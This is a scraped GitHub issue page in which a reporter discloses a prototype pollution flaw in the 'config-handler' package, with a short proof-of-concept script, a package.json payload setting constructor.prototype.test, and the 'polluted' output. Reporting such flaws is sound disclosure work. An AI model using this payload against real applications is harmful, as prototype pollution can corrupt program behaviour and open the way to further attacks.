We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? # to your account
Hey i recently found that your package is vulnerable to Prototype Pollution.
poc.js
const config = require('config-handler')(); console.log(test) console.log(config)
package.json
{ "constructor":{ "prototype": {"test":"polluted"} } }
output polluted
polluted
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Hey i recently found that your package is vulnerable to Prototype Pollution.
poc.js
package.json
output
polluted
The text was updated successfully, but these errors were encountered: